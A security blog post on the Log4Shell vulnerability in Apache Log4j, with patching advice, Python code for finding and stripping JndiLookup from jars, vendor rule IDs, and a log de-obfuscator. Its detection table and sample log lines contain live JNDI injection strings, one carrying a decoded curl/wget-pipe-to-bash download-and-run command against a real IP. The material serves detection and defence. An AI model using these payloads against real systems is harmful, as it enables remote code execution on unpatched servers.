The past couple of days have been abuzz with news of a new critical vulnerability in Apache Log4j. It has been aptly named "Log4Shell" and is tracked as CVE-2021-44228. The vulnerability is so severe that it carries the maximum CVSS score of 10.0, and security vendors across the board are rating it critical.
What is it and why is it so severe?
Log4Shell is a remote code execution vulnerability in the popular Java logging library Log4j 2 (versions 2.0-beta9 through 2.14.1). Log4j expands lookup expressions such as ${jndi:ldap://attacker-host/x} that appear in the messages it logs, so an attacker who can get that string into any logged field (an HTTP User-Agent header, a username, a chat message) can make the server fetch and execute attacker-controlled code, with no authentication required. Services such as Steam, Apple iCloud, and even Minecraft have already been found to be vulnerable to the exploit. Businesses using Apache Struts 2, which bundles Log4j 2, are likely to be vulnerable as well.
What can I do to mitigate this vulnerability?
The best solution is to update Log4j immediately to the patched release, 2.15.0 at the time of writing. Note that 2.15.0 was later found to be an incomplete fix (CVE-2021-45046) and was followed by 2.16.0 and 2.17.0, so take the most recent 2.x release available rather than stopping at 2.15.0. If you cannot update immediately, Apache's documented workaround for affected releases is to delete the JndiLookup class from the log4j-core jar; setting the log4j2.formatMsgNoLookups system property to true (Log4j 2.10 and later) reduces exposure but was later shown to be insufficient, which is why removing the class is the recommended stop-gap. Either way, talk to your security providers immediately about their steps for temporary mitigation.
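As an added illustration of the mitigation step (example code written for this post, not Trend Micro's or Apache's tooling), the Python below walks a directory tree, identifies every jar that embeds log4j-core classes (including shaded application jars, which a search by file name misses), reads the bundled log4j-core version from its pom.properties, and reports whether JndiLookup.class is still present. It also implements Apache's documented stop-gap of deleting that class from the jar. The jars it scans are constructed in a temporary directory for the demo; the verdict strings and demo file names are this example's own choices. A jar reported as not affected by CVE-2021-44228 (such as 2.15.0) may still need the later 2.16/2.17 updates.

```python
import re
import tempfile
import zipfile
from pathlib import Path

# The class Apache's advisory says to delete from log4j-core as a stop-gap.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
CORE_PKG = "org/apache/logging/log4j/core/"


def parse_version(v):
    """'2.14.1' -> (2,14,1,2,0); '2.0-beta9' -> (2,0,0,0,9); '2.0-rc1' -> (2,0,0,1,1).
    Stage rank beta < rc < final keeps pre-releases in Log4j's release order."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$", v.strip())
    if not m:
        return (0,)
    major, minor, patch, stage, n = m.groups()
    rank = {"beta": 0, "rc": 1, None: 2}[stage]
    return (int(major), int(minor), int(patch or 0), rank, int(n or 0))


FIRST_AFFECTED = parse_version("2.0-beta9")
FIRST_FIXED = parse_version("2.15.0")  # first release addressing CVE-2021-44228


def log4j_core_version(jar):
    """Version from log4j-core's own pom.properties, which survives shading."""
    try:
        props = jar.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    m = re.search(r"^version=(\S+)", props, re.M)
    return m.group(1) if m else None


def assess_jar(path):
    """None if the jar carries no log4j-core classes, otherwise a verdict dict."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        if not any(n.startswith(CORE_PKG) for n in names):
            return None
        version = log4j_core_version(jar)
    has_lookup = JNDI_LOOKUP in names
    if not has_lookup:
        verdict = "mitigated-jndilookup-removed"
    elif version is None:
        verdict = "unknown-version-jndilookup-present"
    elif FIRST_AFFECTED <= parse_version(version) < FIRST_FIXED:
        verdict = "vulnerable-cve-2021-44228"
    else:
        verdict = "not-affected-by-cve-2021-44228"
    return {"path": str(path), "version": version,
            "jndi_lookup": has_lookup, "verdict": verdict}


def scan_tree(root):
    """Assess every *.jar under root; detection is by class path, not file name."""
    return [r for r in (assess_jar(p) for p in sorted(Path(root).rglob("*.jar"))) if r]


def strip_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class, the same effect as
    `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`.
    Returns True if the entry was present and removed."""
    path = Path(path)
    tmp = path.with_name(path.name + ".tmp")
    removed = False
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP:
                removed = True
                continue
            dst.writestr(info, src.read(info.filename))
    tmp.replace(path)
    return removed


def make_demo_jar(path, version, with_lookup=True):
    """Constructed stand-in for a log4j-core jar: real entry names, dummy class bytes."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        jar.writestr(CORE_PKG + "Logger.class", b"\xca\xfe\xba\xbe")
        if with_lookup:
            jar.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")
    return path


def demo():
    """Scan a constructed tree, apply the class-removal mitigation, rescan."""
    with tempfile.TemporaryDirectory() as d:
        lib = Path(d) / "lib"
        lib.mkdir()
        make_demo_jar(lib / "log4j-core-2.14.1.jar", "2.14.1")
        make_demo_jar(lib / "log4j-core-2.15.0.jar", "2.15.0")
        make_demo_jar(lib / "app-all.jar", "2.0-rc1")          # shaded app jar
        with zipfile.ZipFile(lib / "other.jar", "w") as z:     # unrelated jar, skipped
            z.writestr("com/example/Main.class", b"\xca\xfe\xba\xbe")
        before = {Path(r["path"]).name: r["verdict"] for r in scan_tree(d)}
        removed = strip_jndi_lookup(lib / "log4j-core-2.14.1.jar")
        after = assess_jar(lib / "log4j-core-2.14.1.jar")["verdict"]
        return {"before": before, "removed": removed, "after": after}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run it against a real deployment root with scan_tree("/opt/app") and act on every "vulnerable" or "unknown-version" verdict; only strip the class from a jar after taking a copy, since the rewrite is in place.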
For Trend Micro customers, the following Trend Micro Cloud One rules are available:
Trend Micro Cloud One™ – Workload Security and Deep Security IPS and LI Rules
IPS Rule: 1011242 – Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
IPS Rule: 1005177 – Restrict Java Bytecode File (Jar/Class) Download
LI Rule: 1011241 – Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)
Add custom LI rules to detect patterns as they are discovered
Follow the steps described on the following page and add the sample patterns below in the pattern-matching field. You can add more patterns as you discover them over time. Keep in mind that attackers obfuscate the lookup heavily (nested ${lower:...} and ${upper:...} lookups, ${::-x} default-value tricks, URL-encoding), so a rule keyed to one literal string or one attacker IP will miss variants; the durable signal is the lookup syntax itself, in particular "${jndi:" and nested "${" expressions inside a logged field.
S No. | Pattern for LI detection
1 | ${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==}
2 | ${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}
Pattern 1 is the unobfuscated form; its Base64 segment decodes to (curl -s 45.155.205.233:5874/204.209.176.243:8080||wget -q -O- 45.155.205.233:5874/204.209.176.243:8080)|bash, a one-liner that downloads and runs a second-stage script. Pattern 2 is the same kind of lookup spelled with nested ${lower:...} and ${upper:...} lookups, which Log4j resolves to ${jndi:ldap://world80.log4j.binAryedge.io:80/callback} before it evaluates the JNDI reference, so a detector has to resolve the nesting too, or match on the nesting itself.
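The sample patterns above are literal strings, and the obfuscated second one shows why literal matching is fragile: the same lookup can be spelled with ${lower:}, ${upper:}, ${::-x} default-value tricks, environment-variable fallbacks or URL-encoding. As an added example (written for this post, not a Trend Micro rule or product code), the Python below de-obfuscates a log line the way Log4j itself resolves nested lookups, innermost first, and then reports the scheme, host and port of any ${jndi:...} that emerges. The access-log lines are constructed for the demo; evil.example and the 203.0.113.x addresses are placeholders, and pattern 2 from the table is reused as the first line. The resolved hosts and ports are what you would feed into an LI rule or a block list rather than the raw obfuscated string.

```python
import re
from urllib.parse import unquote

# Innermost ${...} (no nested $, { or } inside), so nesting resolves inside-out,
# which is how Log4j's own substitutor evaluates it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# A fully resolved JNDI lookup: scheme, host and optional port.
JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z]+):/*([^\s/:}]+)(?::(\d+))?", re.I)


def _resolve_one(m):
    """Evaluate a single innermost lookup the way an attacker relies on it."""
    body = m.group(1)
    prefix, _, rest = body.partition(":")
    key = prefix.lower()
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if key != "jndi" and ":-" in body:
        # ${::-j}, ${env:NOPE:-j}, ${sys:NOPE:-j}: an unknown key falls back to its default.
        return body.split(":-", 1)[1]
    # Anything else, jndi: included, is kept literally; the \x00/\x01 markers
    # stop it from being matched again on the next round.
    return "\x00" + body + "\x01"


def normalize(text, max_rounds=32):
    """URL-decode once, then resolve nested lookups until the string is stable."""
    s = unquote(text)
    for _ in range(max_rounds):
        new = INNERMOST.sub(_resolve_one, s)
        if new == s:
            break
        s = new
    return s.replace("\x00", "${").replace("\x01", "}")


def find_jndi(line):
    """One finding per JNDI lookup that survives de-obfuscation of the line."""
    return [
        {"scheme": scheme.lower(), "host": host, "port": int(port) if port else None}
        for scheme, host, port in JNDI.findall(normalize(line))
    ]


def scan_log(lines):
    """Run find_jndi over every line; findings carry 1-based line numbers."""
    return [{"line": n, **hit} for n, line in enumerate(lines, 1) for hit in find_jndi(line)]


# Constructed sample access log. Line 1 carries pattern 2 from the table above;
# lines 2-4 are obfuscation variants of the same lookup; lines 5 and 6 are benign.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"',
    '203.0.113.8 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.example:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 "-" '
    '"${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://evil.example/x}"',
    '203.0.113.10 - - [10/Dec/2021:12:00:04 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fevil.example%3A1099%2Fobj%7D HTTP/1.1" 404 "-" "curl/7.79"',
    '203.0.113.11 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 "-" "Mozilla/5.0"',
    'app: user=${lower:ALICE} logged in from 203.0.113.12',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Resolution runs innermost-first until the string stops changing, with a round cap so a pathological line cannot spin; anything the resolver does not understand is left literal, which is also what Log4j does with an unknown lookup. Matching on the resolved form means the rule does not need a new pattern for every spelling, and the extracted host and port give you the callback server to block and hunt for.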
To learn more about the Log4Shell vulnerability, refer to the LunaSec guide, or see the Trend Micro guide for further details.